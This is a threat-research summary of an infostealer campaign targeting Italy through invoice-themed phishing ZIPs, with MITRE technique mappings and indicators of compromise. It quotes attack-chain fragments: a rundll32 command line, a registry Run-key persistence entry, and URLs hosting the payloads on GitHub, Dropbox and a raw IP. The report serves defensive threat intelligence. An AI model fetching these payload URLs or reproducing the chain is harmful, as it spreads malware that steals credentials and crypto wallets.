Threat Research

Infostealer Malware: Targeting the Italian Region

Securonix

The campaign targets Italy with phishing emails carrying a password-protected ZIP named “IT_Fattura_n99392.zip” to drop an infostealer payload. It uses a multi-stage chain (LNK and BAT files) and a PowerShell/MSHTA/Rundll32 sequence to download and execute components that exfiltrate system, browser, and crypto-wallet data. Hashtags: #Infostealer #Italy #IT_Fattura_n99392.zip #GitHub #Dropbox

Keypoints

  • The phishing campaign is geo-targeted at Italy and delivered via spam/phishing emails with the subject “Invoice.”
  • The infostealer steals system information, browser data (cookies, bookmarks, credentials), and crypto wallet data.
  • an initial infection uses a password-protected ZIP containing Fattura-related files; the LNK file leads to a BAT that downloads the payload from GitHub.
  • The attack chain employs MSHTA to run a script from a URL, a VBScript that decrypts in memory and launches PowerShell commands.
  • The malware uses rundll32 to launch a legitimate-looking component and drops additional binaries (e.g., start.exe, lib32.exe) to execute payloads.
  • Persistence is achieved via a Run Registry key, and targeted crypto wallets include Dash, Bitcoin, Ethereum, Monero, and others.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – The attacker delivered emails through spam or phishing mail with a password-protected ZIP named “IT_Fattura_n99392.zip.” Quote: “Upon clicking the link, which comes through spam email, a password-protected ZIP file named “IT_Fattura_n99392.zip” is downloaded into the local system.”
  • [T1218.005] Signed Binary Proxy Execution: MSHTA – The VBScript is invoked via MSHTA to run code from a URL. Quote: “it launches powershell.exe and it tries to run the script file directly from the URL using MSHTA.”
  • [T1218.011] Signed Binary Proxy Execution: Rundll32 – The malware uses rundll32 to execute a DLL for rendering/launch. Quote: “”C:WindowsSystem32rundll32.exe” “C:Program FilesWindows Photo ViewerPhotoViewer.dll”, ImageView_Fullscreen C:ProgramDataimage.png”
  • [T1105] Ingress Tool Transfer – The payloads are downloaded from remote sources (GitHub) during execution. Quote: “start.exe downloads binary payloads from github which get dropped in %appdata%Roamingwininfo64lib32.exe”
  • [T1555.003] Credentials in Web Browsers – The trojan exfiltrates browser data (cookies, bookmarks, credentials). Quote: “The trojan steals information such as cookies, bookmarks, credit cards, downloads, and credentials from browsers by comparing the hardcoded browser list.”
  • [T1547.001] Registry Run Keys/Startup Folder – The malware creates an auto-start entry in the Run key. Quote: “HKUSOFTWAREMicrosoftWindowsCurrentVersionRunEAC_Update: “C:UsersAppDataRoamingwininfo64lib32.exe””

Indicators of Compromise

  • [File name] context – IT_Fattura_n99392.zip, Fattura 06-12-2022.lnk, and Fattura_IT9032003.bat
  • [MD5 hash] context – 325aae0178932659c1d89a49328066a6, 6fff73f5118cee25cf496fbd192aa940
  • [Domain/URL] context – https://dl.dropboxusercontent.com/s/52eq2p19vc0dcei/IT_Fattura_n99392.zip, http://116.203.19.97/1/lib32.hta
  • [Domain/URL] context – http://116.203.19.97/1/Fattura_IT9032003.bat, https://github.com/NET-FrameWork-x64/NET/raw/main/NETFramework.zip
  • [Domain/URL] context – https://github.com/alibaba2044/hauL2/raw/main/wininfo64.zip
  • [IP address] context – 195.201.23.210
  • [File name] context – image.png, NETFramework.zip, start.exe, lib32.exe, Ejefqnxog.dll(Memory)

Read more: https://www.uptycs.com/blog/infostealer-malware-attacks-targeting-italian-region/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint